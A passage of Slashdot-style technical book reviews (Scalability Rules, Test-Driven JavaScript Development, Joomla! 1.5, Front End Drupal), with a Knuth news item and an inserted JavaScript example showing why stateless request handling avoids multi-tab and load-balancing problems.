The final rule of chapter one is the first one I disagree with in the book. The rule says "Don't mix the vendor networking gear." And this goes against every fiber of my being. Why even have networking standards if you are not to mix the vendor networking gear? Looking to upgrade one component? Better stick to brand X no matter how crappy they have become. This results in being nickeled and dimed and vendor lock-in. If scalability is your sole goal then perhaps these are sound instructions. But I cannot understand how anyone would indicate lock-in to a vendor — especially in today's networking gear.
Chapter two is incredibly short but potent. It covers some basic database concepts like why ACID properties of databases make them difficult to split. This chapter is spot on and calls upon the AKF cube for dimensions of scalability. Three dimensions are: You can clone things, split different things and split similar things (like by country region). This cube reappears throughout the book and it should be noted that the book does a good job of giving examples of when each dimension is a good choice for scaling and when it is a bad choice compared to the other two. In my line of work, massive scaling solutions have implemented all three.
Skipping to the next developer chapter on not duplicating your work, the text ranged from the incredibly obvious "Don't double check your work" to relaxing temporal constraints. The chapter is short like chapter two and didn't offer me a whole lot. A third rule was again oddly specific in saying not to do redirects and even getting down into the very fine specifics of what HTTP codes are and how they affect your response times.
The next chapter for developers is chapter ten on avoiding or distributing state. Rule 40 actually came in useful at my job as it simply states "Strive for Statelessness." There was an easy solution to a problem in one of our projects that involved storing an object in the session to keep track of what was being displayed to the user. Having read the book, I instead made this web application nearly stateless (except user authentication and the like). Later on, as we started testing the application in multi-tabbed browsing and users began opening many search tabs and viewed several objects at once to compare them, I was glad that I had not gone down this path. Doesn't have much to do with scalability but I think all web developers should read this chapter as it really does pay to avoid state when possible.
As the rules grew closer to 50, they lost their potency. The authors did a good job of trying to put a bit of ranking in the appearance to these rules. The final developer chapter on asynchronous communication and message buses is probably the most specific and was the least useful for me. While all the rules in this chapter are true, they again border on the banal with examples like "Avoid Overcrowding Your Message Bus."
Having read this book cover to cover, it is a very short book with extremely succinct and organized summaries (the final chapter is a short review of each rule). The manager and operations chapters didn't really do a lot for me overall but would occasionally have very interesting chapters that opened up a lot of the logic behind content delivery services to me. Occasionally I would take slight issue with some rules but the most egregious rule I read was Rule 28 "Don't Rely on QA to Find Mistakes" and then the chapter opens with calling the title of this rule "ugly and slightly misleading and controversial." Because it is and could probably be replaced with another sentence from the chapter: "You can't test quality into your system." Why rely on sensational headlines when I'm already holding your book? I think this book would have been a solid 9/10 if not for this oddity in the large rule set.
I've given each of these rules a decent amount of thought and will keep them at the back of my mind as I write code in an agile environment. Mistakes made early on can be very costly in scaling terms. This book will definitely be kept around at work when I need a solid argument for those design decisions that might take more work but save in the future when it needs to scale.
You can purchase Scalability Rules: 50 Principles for Scaling Web Sites from amazon.com.
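The review above mentions two consequences of keeping per-user state on the server: the reviewer's multi-tab problem (several tabs sharing one session cookie) and the book's "clone things" scaling dimension, which only works when any instance can serve any request. The block below is an added example, not code from Scalability Rules or from the reviewer; it models two hypothetical request handlers as plain functions (no real web framework, and the session cookie values are constructed) and shows both failures falling out of the same design choice.

```javascript
// Added example, not code from Scalability Rules or from the reviewer.
// Two hypothetical handlers for "view object" and "show details of the
// object being viewed": one keeps that fact in server-side session state,
// the other makes each request carry it. No real framework is involved.

// Stateful variant: the server remembers the object a session is viewing.
function createStatefulApp() {
  const sessions = new Map(); // sessionId -> { viewing: objectId }
  return {
    // GET /view?id=X : remember what this session is now looking at
    view(sessionId, objectId) {
      sessions.set(sessionId, { viewing: objectId });
      return `viewing ${objectId}`;
    },
    // GET /details : relies entirely on the remembered id
    details(sessionId) {
      const s = sessions.get(sessionId);
      if (!s) throw new Error('no object selected');
      return `details of ${s.viewing}`;
    },
  };
}

// Stateless variant: nothing is kept between requests except (not modelled
// here) authentication; the object id travels with every request.
function createStatelessApp() {
  return {
    view(_sessionId, objectId) {
      return `viewing ${objectId}`;
    },
    details(_sessionId, objectId) {
      return `details of ${objectId}`;
    },
  };
}

// One user, one session cookie, two browser tabs. Tab 1 opened A, tab 2
// opened B, and tab 1 then asks for the details of what it is showing.
function multiTabScenario(app, stateless) {
  const cookie = 'sess-42'; // constructed sample value
  app.view(cookie, 'A');
  app.view(cookie, 'B');
  return stateless ? app.details(cookie, 'A') : app.details(cookie);
}

// Scaling angle: two cloned instances behind a round-robin balancer. The
// stateful app's Map lives inside each instance, so the second request
// lands on a copy that has never heard of the cookie.
function roundRobinScenario(factory, stateless) {
  const instances = [factory(), factory()];
  let next = 0;
  const route = () => instances[next++ % instances.length];
  const cookie = 'sess-7'; // constructed sample value
  route().view(cookie, 'A');
  try {
    return stateless ? route().details(cookie, 'A') : route().details(cookie);
  } catch (e) {
    return `error: ${e.message}`;
  }
}
```

With the stateful handlers, tab 1 receives the details of B (the cross-tab mix-up the reviewer ran into), and the cloned deployment answers with an error because the second instance has no session entry; the stateless handlers return the details of A in both scenarios. Sticky sessions or a shared session store can paper over the second problem, but they reintroduce exactly the coupling that "Strive for Statelessness" removes.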
Book Review: Test-Driven JavaScript Development
eldavojohn writes "Test-Driven JavaScript Development by Christian Johansen is a book that thoroughly guides the user through some of the more advanced aspects of the JavaScript language and into Test-Driven Development (TDD). Throughout it, Johansen introduces great methods and utilities like libraries to accomplish all aspects of TDD in JavaScript. The book begins with Johansen demonstrating and teaching the reader some of the more advanced aspects of JavaScript to ensure that the following lessons in TDD are well understood. The best part of the book is in the last half where Johansen builds a chat client and server completely out of JavaScript using TDD right before the readers' eyes." Keep reading for the rest of eldavojohn's review.

Test-Driven JavaScript Development
author: Christian Johansen
pages: 475
publisher: Addison-Wesley Professional
rating: 9/10
reviewer: eldavojohn
ISBN: 978-0-321-683915
summary: An in-depth look at Test-Driven Development in JavaScript.

First off, the audience for this book is JavaScript developers interested in TDD. More specifically, I would identify the audience being the poor developers that have slaved over JavaScript for endless hours only to find out that there are 'discrepancies' in how their JavaScript functions in one browser versus another (or even across versions of the same browser). If you've ever come into work one day to learn that the latest version of Internet Explorer or Mozilla Firefox now throws errors from the deep recesses of your code and you have absolutely no idea where to start, then this book may be an item of interest to you. After all, wouldn't it be great to pull up the new browser and simply watch all your tests complete code coverage with glaring red results listing specific problematic locations?
Secondly, I'd like to establish that I'm writing this review with two key assumptions. The first assumption is that JavaScript is not in and of itself evil. You might hate JavaScript (as did I at one time) but it's a very flexible and enjoyable language when you're not battling some crazy 'feature' that a particular JavaScript engine exhibits or some issue with the dreaded Document Object Model (DOM). The second assumption is that TDD is a net positive when done correctly. To some, it may be a hard sell and the author of the book is no blind preacher. TDD has its pitfalls and the book adequately notes these claiming that TDD can actually work against you if used improperly. Feel free to wage wars in the comments debating whether or not the average JavaScript monkey is capable of avoiding pitfalls and learning to write good unit tests — I'm not getting sidetracked in this review on those topics.
This book is divided into four parts. The first part of the book gives you a slight taste of testing right off the bat in chapter one (Automated Testing). Johansen starts by showing a strftime function written in JavaScript and demonstrates briefly the very clumsy standard method of testing the method in a browser. From there he introduces Assertions, Setup, Teardown and Integration Tests. What I particularly enjoyed about this book is that these key components are not forgotten after introducing them; Johansen constantly nods to the reader when duplicate code could be moved to Setup or Teardown.
Chapter two is devoted to 'turning development upside-down.' This chapter analyzes the mentality of writing a test, running the test, watching it fail, making the test pass and then refactoring to remove duplication (if necessary). Johansen stresses and restresses throughout the book that the simplest solution should be added to pass the test. Fight the urge to keep coding when you are sure what comes next and just make sure you have unit tests for that new code. The third chapter runs through many test frameworks in JavaScript and settles in on JsTestDriver weighing the pros and cons of each option. Lastly, it is demonstrated how to use JsTestDriver both inside Eclipse and from the command line (something I deeply appreciated). Chapter Four expands on this by proposing learning tests which are tests that you keep around to try out on new browsers to investigate what you depend on. I'm not entirely sold on this practice but this chapter is definitely worth the look at performance testing it provides in a few of the more complete aforementioned frameworks.
The next 145 pages are devoted to the JavaScript language itself. The reader will find out in later chapters why this was necessary but this second part felt too long and left me starving for TDD. There's a ton of great knowledge in these chapters and Johansen demonstrates an impressive display in his understanding of ECMAScript standards (all versions thereof) and all the JavaScript engines that implement them. In the following four chapters, the reader is shown the ins and outs of scope, functions, this, closures, anonymous functions, bindings, currying, namespaces, memoization, prototypical inheritance, tons of tricks with properties, mixins, strict mode and even the neat features of tddjs and JSON. What I was most impressed with in this chapter was how much care Johansen took with noting performance pitfalls in all of the above. Example: "closures in loops are generally a performance issue waiting to happen" and on for-in arrays he says "the problem illustrated above can be worked around, as we will see shortly, but not without trading off performance." Johansen seems tireless in enumerating the multitude of ways to accomplish something in JavaScript only to dissect each method critically. If you skip these sections, at least look at 6.1.3 as the bind() implementation developed there becomes critical throughout much of the book's code.
Chapter nine provides yet more dos and do nots in JavaScript with a tabbed panel example that demonstrates precisely what obtrusive JavaScript is and why it is labeled as such. Chapter ten is definitely not to be skipped over as it provides feature detection methods (specifically with regard to functions and properties) that are seen in later code snippets. Part two is devoid of any TDD yet rich in demonstrating the power of JavaScript. This is where the book loses a point for me as this seemed too long and a lot of these lessons — though informative — really seemed like they belonged in another book on the JavaScript language itself. I constantly wondered when I would start to see TDD but to a less experienced developer, these chapters are quite enlightening.
In the third part, we finally get to some TDD in which an Observer Pattern (pub/sub) is designed using tests with incremental improvements in true TDD fashion. Most importantly to the audience, we encounter our first browser inconsistencies that are tackled using TDD. This chapter illustrates how to make your first tdd.js project using the book's code and build your first tests followed up with the isolation of the code into setup and teardown functions. Rinse, wash, repeat for adding observers, checking for observers and notifying observers (all key functionality in the common observer paradigm). This is a great pragmatic example for TDD and the chapter wraps up with error checking and a new way to build a constructor. As we do this, we have to make changes to the tests and Johansen illustrates another critical part of TDD: fixing the tests after you've improved your code.
The twelfth chapter takes our Ajax friend the XMLHttpRequest object and gives it the same treatment as above. Of course, you might know it as the Msxml2.XMLHTTP.6.0 object or a variety of names so this is where our browser differences are exposed. On top of that, we're exposed to stubbing in order to test such an object. The author explores three different ways of stubbing it while building tests for GET requests. After building helpers to successfully stub this, we move on to POST, finally send data in a test and then pay attention to the testing of headers. Personally these two chapters were some of the best in the book and illustrated well a common method of utilizing TDD and stubbing to build up functional JavaScript.
Chapter thirteen builds on the previous chapter by examining polling data in JavaScript and how we might keep open a constant stream of data. Before jumping to the solution, the author investigates strategies like polling intervals and long polling which have their downfalls. We eventually come to the Comet client (which uses JSON objects) and build up our test cases that support our development of our new streaming data client. One important aspect brought up is the trick of using the Clock object to fake time. This was completely new to me and very interesting in simulating time with tick() to quickly fake and test expected lengths of time.
Chapter fourteen was definitely outside of my comfort zone. JavaScript on the server-side? Blasphemy! Johansen begins to bring together the prior elements to form a fully functional chat server all in JavaScript through TDD. In this chapter the reader is introduced to node.js and a custom version of Nodeunit the author modified to make a little more like JsTestDriver. The controller emerges through the TDD cycles. Responses to POST, adding messages, the domain model and even storage of data are given test cases to ensure we are testing feature after tiny feature. Toward the end of the chapter, an interesting problem arises with our asynchronous interface. In testing it, how do we know what will result from a nested callback? Johansen introduces the concept of a Promise which is a placeholder that eventually provides a value. Instead of accepting a callback, the asynchronous method returns a promise object which is eventually fulfilled. We can now test adding messages in an asynchronous manner to our chat room. The chapter builds on the chat server to passable functionality — all through TDD.
Chapter fifteen concentrates on building the chat client to the above server and in doing so provides the reader with TDD in regards to DOM manipulation and event handling. This chapter finally covers some of the more common problematic aspects of client-side JavaScript. Again, this chapter yielded many tricks that were new to me in TDD. JsTestDriver actually includes two ways to include HTML in a test and Johansen shows how to manipulate the user form on a page in order to test it automatically. The client is developed through TDD and node-paperboy is called in to serve up static files through http with Node.js. The message list displayed in the client is developed through TDD and then the same process used on the user form is done with the message form submission. The author brings in some basic CSS, Juicer and YUI Compressor to reduce all our work down into a 14kB js file containing an entire chat client. With gzip enabled it downloads at about 5kB. Potent stuff.
I was sad that more pages weren't spent on the final section. Chapter sixteen further expounds upon mocking, spies and stubbing. It lists different strategies and how to inject trouble into your code by creating stubs that blow up on purpose during testing. And we get a sort of abbreviated dose of Sinon, a mocking and stubbing library for JavaScript. The author repeats a few test cases from chapter eleven and moves on to mocking. Mocking is mentioned throughout the book but is passed over due to the amount of work required to manually mock something. The chapter ends with the author saying 'it depends' on whether you should use stubbing or mocks but it's pretty clear the author provides stubbing as he enumerates the pros and cons of each.
Chapter seventeen provides some pretty universal rules of thumb to employ when using TDD. From the obvious revealing intent by clear naming to strategies for isolating behavior, it's got good advice for succeeding with TDD. This advice aims to improve readability, generate true unit tests that stay at the unit level and avoid buggy tests. It's worth repeating that he gives a list of 'attacks' for finding deficiencies in tests: "Flip the value of the boolean expressions, remove return values, misspell or null variables and function arguments, introduce off-by-one errors in loops, mutate the value of internal variables." Introduce one deficiency and run the tests. Make sure they break when and where you would expect them to or your testing isn't as hardened as you might expect. Lastly the author recommends using JsLint (like lint for C).
There's a lot of information in this book but I think that the final examples were actually too interesting for my tastes. Often I grapple with the mundane and annoying parts of the client-side DOM — nothing on the server side. While this might change at some point in the future, I couldn't help but feel that the book would have been better with additional examples of more common problems than a chat client in JavaScript. I was certainly impressed with this example and it will hold the readers' attention much more than what I desire so I feel comfortable recommending this book with a 9/10 to anyone suffering from browser inconsistencies or looking to do TDD in JavaScript.
You can purchase Test-Driven JavaScript Development from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page. -
Volume 4A of Knuth's TAOCP Finally In Print
jantangring writes "It's been 28 years since Volume 3 of Donald Knuth's The Art of Computer Programming was published. The book series is a classic work of computer science in spite of the fact that more than half of the seven-volume series is still to be finalized. In 1992 Donald Knuth retired to medieval monkness in order to finish his work. After many long years in draft, volume 4A is now in print and you can get it in a boxed set if you don't mind admitting that you don't already own the first three volumes. They won't be checking if you read it." -
Joomla! 1.5: A User's Guide, 2nd Edition
Michael J. Ross writes "There are countless content management systems (CMSs) available for building websites, and they offer varying levels of built-in functionality. But once a site developer has successfully installed any given CMS, a critical form of help (or hindrance) is the CMS's documentation, which for some CMSs is quite impressive, and for others absolutely atrocious. Joomla is a powerful and popular choice for Web developers, but can be daunting to newbies confused by its non-intuitive menu structure and restrictive content hierarchy. The documentation for Joomla is frequently criticized, for various reasons, and that may largely account for the popularity of third-party books — such as Barrie M. North's Joomla! 1.5: A User's Guide, now in its second edition." Read on for the rest of Michael and Ethelyn's review.
Joomla! 1.5: A User's Guide, 2nd Edition
author: Barrie M. North
pages: 480
publisher: Prentice Hall
rating: 9/10
reviewer: Michael J. Ross and Ethelyn Holmes
ISBN: 978-0137012312
summary: A comprehensive introduction to creating sites using Joomla.
The book was published by Prentice Hall, on 1 June 2009, under the ISBN 978-0137012312. Just as with its predecessor, this updated edition spans 480 pages, and the material is grouped into 12 chapters: an introduction to CMSs in general and Joomla in particular; downloading and installing Joomla; basic Joomla administration; content management using Joomla; menus and navigation; enhancing Joomla functionality with extensions, components, modules, plug-ins, and templates; creation of content via the back-end and front-end; attracting Web traffic using SEO, referrals, and other techniques; how to create pure CSS templates; and building example websites for a school, a restaurant, and a blog. The book wraps up with four appendices on getting assistance with any Joomla development hurdles; four separate Joomla case studies; an introduction to SEO concepts; and installing WampServer.
On the book's Web page, the publisher makes available a description of the book, excerpts from Amazon.com reviews, the table of contents, and a sample chapter — "Creating Pure CSS Templates in Joomla!" — as both an online article and as a downloadable PDF file. There are also links for purchasing the print version, and for reading the Safari Books online version.
In conjunction with the book, Prentice Hall has published a DVD training course, titled Fundamentals of Joomla!, under the ISBN 978-0137017812. It consists of 13 lessons, spanning more than nine hours of video instruction. The DVD includes a bonus chapter explaining how to set up a membership site, not covered in the print book. The DVD disc is accompanied by a 128-page book, which includes all of the PHP and CSS code used in the training, plus additional material. As of this writing, Barnes & Noble is selling Joomla! 1.5: A User's Guide, 2nd Edition and the video training course bundled together. Anyone purchasing the video course should be aware that Lesson #6 on the DVD has a compression problem, which causes a small lag between the audio and video streams. In response to this, Prentice Hall uploaded that particular lesson as a free download to the product's site, under the "Updates" tab. A multimedia training course such as this may be the ideal tool for someone who finds printed technical books to be rather dry, and prefers learning from audiovisual material.
In this review, we will be examining both the book and the DVD training course, as the two complement one another.
Barrie North is well regarded in the Joomla community, and for good reason. He frequently blogs about Joomla on the website of Compass Design, a consulting firm specializing in Joomla Web design and SEO. Joomla developers consider Compass Design's site a source for some of the most up-to-date information on the subject. Barrie also founded Joomlashack, a noted provider of Joomla templates and customization services. He has more than 15 years of Internet experience as a Web designer, plus over a decade of classroom teaching experience and curriculum development expertise. He consults on Web marketing, search engine optimization, usability, and standards compliance for Joomla. He's also a former member of the Joomla Design and Documentation Working Groups.
The title of his book's first chapter, "Content Management Systems and an Introduction to Joomla!," fairly describes what the reader will find. As a CMS, Joomla's primary function is to organize and present all the content stored in a site's database, avoiding the problems in the past of static HTML files. This chapter presents Joomla's out-of-the-box features and delineates its various parts, templates, and modules. The DVD mentioned above shows the differences between constructing an ordinary Web page with Dreamweaver and constructing one with Joomla. People who learn best visually should be pleased with this demonstration, as well as Barrie North's teaching approach. He holds one's attention with a friendly yet informative conversational style. This first chapter provides an in-depth tutorial that explains how Joomla displays its content articles, and how the developer can organize them into a hierarchical structure. It details how to plan and organize the content and user experience for the site. It also explains the hierarchy structure currently used in Joomla — sections and categories — and how to best structure content into them for small and large sites.
The second chapter, "Downloading and Installing Joomla!," gives the reader a very detailed explanation on how to get up and running with Joomla. It explains where one can find the most current Joomla files; how to unpack these files on a home computer or into a remote Web hosting account; how to use the Joomla Installation Wizard; and how one can support the Joomla project. Barrie states that the worst part of the Joomla installation process is setting up the MySQL database, and uploading all the files to a remote server. But for anyone who has performed those tasks with other software technologies, the process should not pose a problem.
Chapter 3, "Joomla! Administration Basics," shows the power of the Joomla site administration system, despite its simplicity. Compared to such site administration systems as those for WebLogic and Oracle AS, Joomla's system is a piece of cake. Readers should find the DVD especially helpful during the presentation of the back-end, front-end, control panels, and menus — especially the demonstration and explanation of such topics as articles, the front page, sections, categories, and modules. Barrie also gives tips on how to import and export users to Joomla, and about language extensions.
The fourth chapter, "Content Is King: Organizing Your Content," is a substantial and key chapter for those building a site with Joomla. It delves into Joomla's so-called "managers": the Article Manager, Frontpage Manager, Section Manager, Category Manager, and Module Manager. The author explains how to organize content logically, and the role of components and modules. Someone new to Joomla could otherwise find the many components and modules confusing. Of course, one can play around with them, but it is much more efficient to learn what one is doing from an expert. He demonstrates the Custom HTML module very well, and in the DVD walks the viewer through the development of a site using it.
Creating menus and navigation in a CMS is often perplexing to the uninitiated, and that's the topic of Chapter 5. It covers how to work with menu items, and clears up the issue about how to get rid of the dreaded "Welcome to the Frontpage." It also gets into managing modules (as opposed to Chapter 4's managing module content). Barrie North states that menus are perhaps the core of a Joomla site. In a static HTML site, they merely serve as navigation; in a Joomla site, they not only serve that purpose, but also determine the layout of what a dynamic page will look like and what content will appear on that page when the visitor navigates to it. The relationships among menus, menu items, pages, and modules, are perhaps the most confusing aspect of Joomla. Newbies can find daunting why some menu content shows up in articles, and then how to get rid of it. In this chapter, the reader learns how to create a navigation scheme that works for a new site.
Chapter 6, "Extending Joomla!," explains why extensions are essential to any well-functioning Joomla site. Rare is the Joomla-powered website that has no additional functionality, beyond the basics. In the world of Joomla, the term "extension" collectively describes components, modules, plugins, and languages. There are many hundreds available, both free and commercially from third-party providers. This chapter covers the Joomla 1.5 core templates — Khepri, Milkyway, JA Purity, and Beez — as well as how to use third-party templates.
In Chapter 7, "Expanding Your Content: Articles and Editors," the author returns to the critical topic of content management — specifically, WYSIWYG (what you see is what you get) editing, and how it relates to the backend with what Joomla refers to as Managers, Administrators, and Super Administrators. Barrie North then examines how authors, editors, and publishers can manage content through the front-end, as well as how administrators can set various permissions through the Menu Managers. This is critical for the site developer who wants users to be able to update content in a controlled manner, without breaking other things (inadvertently or otherwise!). Quite useful is Joomla's "global checkout" feature, which allows only one user at a time to lock and then edit articles, and, if necessary, fix problems with checked-out articles.
The most attractive and powerful Joomla site in the world will be useless without visitors. Chapter 8, "Getting Traffic to Your Site," benefits from the author's knowledge and experience in online marketing and search engine optimization. For instance, he explains why the developer should discourage clients who ask for Flash-heavy sites, because pages loaded down with Flash elements can discourage traffic, for various reasons. In the DVD training material, he presents a step-by-step process of bringing traffic to an example site, using Wordtracker and Google tools. He also shows how to use Google advertising tools such as AdWords and AdSense. Interestingly, Barrie North does not put too much stock in keywords and metadata, but rather emphasizes the use of page titles as traffic magnets. He argues in both the DVD and the book that while email blasts may be effective and popular marketing tools, they should be used with caution. He also covers how blogs are another useful method for bringing traffic to one's sites.
The final four chapters in the book are all hands-on application of concepts and lessons covered in the earlier part of the book — specifically, how to create pure CSS templates, and how to create the three sample sites (for a school, a restaurant, and a blog).
Appendix A provides information on getting help with Joomla. If one is interested in seeing how Joomla is used in the real world, then Appendix B should prove valuable, because it offers information on Joomla's usage for commercial and government websites. Appendix C provides a quick overview of search engine optimization. Appendix D goes into detail on WampServer installation, with corresponding illustrations.
The book contains some errata: "Cpanel" (pages 25, 27, and 289), and "add fee" (should read "ad fee"; page 218). Those errata were present in the first edition, and even pointed out to the publisher in an earlier review.
The book's material is organized so that the reader can utilize it as a tutorial, reading from cover to cover, or skim through and take what is needed at the moment. The introductory ideas in the earlier chapters are developed and built upon to help the reader understand more advanced concepts later on. The book can also be used as a reference. For instance, if the reader desires a quick overview of what newsletter extensions are available, Chapter 6 provides that information. Lastly, the appendices contain valuable extra information about various aspects of Joomla. The target audience does not have to understand PHP in order to read this book or work through the many examples. Each example is presented in a clear step-by-step fashion. If a reader were to implement all of the examples in her development environment, then she would gain the skills to be able to build a substantial website. The DVD has an extra chapter on building a membership site. If the reader would like to go into the business of creating Joomla templates, the author even has a chapter showing how to do just that.
Joomla! 1.5: A User's Guide, 2nd Edition is to be recommended, particularly when matched with the DVD training course. Together they form a valuable reference guide and self-teaching tool, for newbies as well as seasoned website developers.
Michael J. Ross is a freelance website developer and writer. Ethelyn Holmes is a software and website developer — primarily using Java / J2EE and Joomla.
You can purchase Joomla! 1.5: A User's Guide, 2nd Edition from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page. -
Front End Drupal
Michael J. Ross writes "Content management systems (CMSs) are created largely by Web developers using back-end programming languages (such as PHP, by far the most common choice). The free CMSs are built as open source projects, by volunteers who have many demands on their time. As a result of both of these competing factors, far less time is devoted to the front-end aspects of these CMSs. In turn, the "themes" that define the appearance of a CMS-based website are typically substandard, in the eyes of many Web designers and, most likely, countless users of those sites. This criticism has been leveled even against Drupal, although the situation is improving. A new book, Front End Drupal: Designing, Theming, Scripting, is intended to help Drupal designers everywhere speed up that process of improvement." Read on for the rest of Michael's review.
Front End Drupal: Designing, Theming, Scripting
author: Emma Jane Hogbin and Konstantin Käfer
pages: 456
publisher: Prentice Hall
rating: 8/10
reviewer: Michael J. Ross
ISBN: 978-0137136698
summary: A comprehensive guide to creating Drupal themes.
The book was written by Emma Jane Hogbin and Konstantin Käfer, and published by Prentice Hall on 15 April 2009, under the ISBN 978-0137136698. As suggested by its title, Front End Drupal "is designed to help both experienced designers and rank novices get an understanding of how Drupal theming works," to quote from the book's foreword, written by Dries Buytaert, Drupal's founder and project lead. He notes that creating a Drupal theme requires knowledge of "XHTML, CSS, JavaScript, and PHP, all within the context of Drupal." These are some of the key technologies addressed in the book's eleven chapters, and it assumes that the reader is at least familiar with all four of them.
The first of the two appendices explains: how to install Drupal and contributed modules on the three different platforms supported (Windows, Linux, and Mac OS X); basic configuration and administration; and installation troubleshooting tips. The second appendix comprises some of the more important example code used in the book, and brief overviews thereof. At the end of the book's 456 pages, there is a coupon code for a 45-day free subscription to read the online edition in the Safari Books Online library.
All of the sample source code and themes can be downloaded from the authors' book website. The site also has the author biographies, as well as reported errata, of which there are two, as of this writing. What is most striking about the site is its styling — or lack thereof. One would think that the authors of a book on Drupal theming would have put a commensurate amount of effort into crafting an attractive custom theme for their own website — one that demonstrates their own theming skills and, more importantly to the reader, what is possible using the principles taught in the book. Remarkably, the authors appear to have done nothing more than take the Drupal 6 default theme, Garland, and change the color scheme from shades of blue to shades of brown (matching the book cover); only the blue Drupal icon is unchanged, and its color clashes with the rest of the site.
Prentice Hall makes available their own Web page for the book, where visitors will find a description, two Amazon.com reviews, the table of contents, and a sample chapter ("The Drupal Page") as a PDF file. The entire book is also available in electronic form.
In the book's preface, the authors briefly summarize the chapters and appendices, and define the target audience and technologies with which the reader should be knowledgeable (noted above). Readers should also be familiar with how Drupal works, have some experience administering a Drupal site, and ideally possess some knowledge of website design and development; but that last one is not a hard requirement, since the authors promise to explain the basic concepts as needed.
Any reader who begins the book by skimming the table of contents or the preface's summary of Chapter 1, may be tempted to skip that chapter, especially since it discusses team workflow — something freelancers generally ignore, and employees leave to management. Yet the earlier material is worth reading, if only that it begins to establish a baseline of terminology used throughout the rest of the book. It also provides some basic information on content structure, layout, and naming on a Drupal page. For illustrating the ideas under discussion, the authors use a number of existing websites. In fact, too many different sites: Readers probably would have found it more useful for each idea to be presented in the context of a single neutral subject area, and without distractions such as toilet birthdays (no kidding). Even better, the ideas could have been illustrated through example pages — each page illustrating one or several ideas — built from the ground up. By focusing on pages that a reader could quickly create on his own, the authors could have eliminated the screenshots of those various websites. One example is Figure 1.1, which combines two images, with the topmost one largely obscuring the one below. Most of the topics are covered at a very high level — possibly higher in some cases than readers will find valuable. Nonetheless, there is much solid advice, including some recommended theme resources later in the chapter. In the earlier section on "Topical Organization," there is a brief but excellent discussion on the relative merits of limited versus unlimited tag vocabularies.
The second chapter continues to lay the groundwork, by introducing basic Drupal theme strategies and terminology, three major modules that veteran Drupal developers use frequently (CCK, Views, and Devel), and some valuable browser-based development tools. The definitions of Drupal terms are useful — especially for newbies confused by the Drupal handbooks. One exception is the authors' alternative metaphor for "weight," which proves more confusing than the original. Readers then begin learning how to use the aforesaid modules and tools. However, several of the authors' statements are misleading: On page 43, they are instructed to install the CCK module, and then given a list of additional modules needed; the first one on the list is... CCK. On the next page, the authors state that the FileField module requires the Token module, but it apparently does not. On the page after that, the "manage fields" link is given as the "add field" link. Those last two discrepancies suggest that the book is based on outdated versions of Drupal and/or the contributed modules under discussion, even though its publication date is just a few weeks prior to this writing. Any version differences are likely impossible to confirm, since the authors fail to mention which versions they are using, or provide any guidance to the reader as to which versions to use — unusual for a programming book. At the beginning of the chapter, the reader is told he "will learn step-by-step how to create a mini portfolio Web site," but the process peters out not long after a new content type is created, and the reader finishes the chapter with no such portfolio site.
Chapters 3 and 4 move the reader one step closer toward the ultimate goal of being able to create a new theme with confidence. The first one explains how to find, install, and configure prebuilt themes — also, how to create a very basic theme from scratch, and a subtheme using the Zen starter theme. This material comprises a generally thorough introduction to the topics, compared to most documentation, with plenty of step-by-step explanation. An exception is the Zen section, in which the reader is instructed to place the directory into the themes folder; but it is not made clear whether this is the primary Drupal themes folder, or sites/all/themes (as advised several pages earlier). Secondly, in step 3, readers can only guess as to what is meant by "the main CSS file," as there are several. On the next page, the authors mention "configure" links next to the Zen and Zen Classic themes, but no such links exist for those starter themes. The fourth chapter discusses page template files, site-wide variables, menus and navigation, regions and blocks, search results, templating different sections of a site, aliased URLs, taxonomy templates, and styling for output to printers, PDF files, and mobile devices.
The fifth chapter explores the details of how to modify existing node templates, or create new ones, for all content types. This is what makes it possible to develop highly customized page content, including summaries, embedded images, image galleries, and content based upon output from the Views module. The subsequent chapter focuses on one of the most problematic types of content — forms — and how they can be created using the CCK. The authors recommend TinyMCE as one's WYSIWYG editor module, but that has apparently been replaced by the Wysiwyg API. User editing of content is a key element in building an online community using a Drupal-based site, and it is the topic of Chapter 7, which discusses user profiles, permissions, access, comments, blogs, forums, wikis, spam, CAPTCHAs, and how to make content private for members only. The next chapter addresses the theming of the administrative interface, which the typical site user will never see, but can have a significant impact upon the productivity of the developers and maintainers of a site. Readers learn about RootCandy (a refreshingly different admin theme), and how to theme error pages.
The final three chapters focus on JavaScript and jQuery. Consequently, they compose a stand-alone resource of their own, and could even have been used as the basis for a separate book. Chapter 9 provides an overview of the language, while the other two chapters cover jQuery and how it can be used as part of a Drupal-based site.
Scattered throughout the manuscript are tips, each indicated with a pencil tip icon. These help to break up the text visually, and provide valuable guidance. The contrast between the black text and the dark gray background could certainly be improved; but most of the tips are fairly short, so this does not pose a major problem.
Every chapter ends with a summary, and not a single one of them is useful or needed. Any unique information conveyed in them should have been merged with the introductory paragraphs for the respective chapters, which is where readers would be looking anyway to see what each chapter addresses.
The book has numerous minor problems, including grammatical and stylistic errors, such as dashes incorrectly performing the duty of semicolons, some URLs missing the root directory slash, and excessive use of exclamation marks (more than a dozen before even reaching the second chapter). When stating the sequence of menu items to choose in order to reach a particular admin page, the authors should use ">" or ">>" to separate the menu choices, as is done in most computer books. Instead, the authors opted to use commas, which of course turns every sequential menu path into a list of menu items, which is nonstandard and disconcerting. As is typical in a first edition, the book contains several errata: "Partnership" in Figure 1.7 (page 10), "the GiMP" (page 14; should simply read "GIMP"; after all, this isn't Pulp Fiction), "only focus only" (page 26), "Modification / Date" in Figure 2.1 (page 37; should read "Modification date"), "Content Creation Kit" (throughout the book; should read "Content Construction Kit"), "of [the] view" (page 56), "http:jigsaw" (page 66), "INSTALL [is] present" (page 79), "of [a] page" (page 100), and "to to" (page 125) — in the first quarter of the book alone.
A lingering disappointment is that some of the promised examples are not finished in the narrative, such as the portfolio site mentioned earlier. Secondly, the downloadable source code is incomplete, apparently missing the example code in the first few chapters, such as the Bolg theme files. Furthermore, the downloadable code is not organized by chapter, making it difficult to even determine what example code is missing.
On the other hand, the book has much to offer. For the most part, the explanations and step-by-step instructions are clear, and the diagrams and screenshots are all neatly presented and helpful — though some sections of the book could have benefited from more such figures. With its extensive coverage of all the key technologies, and its wealth of valuable tips, Front End Drupal is an essential resource for learning how to create Drupal themes, and fills a long-standing gap in the Drupal literature, better than any other book currently available.
Michael J. Ross is a freelance Web developer and writer.
You can purchase Front End Drupal: Designing, Theming, Scripting from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page. -
Securing PHP Web Applications
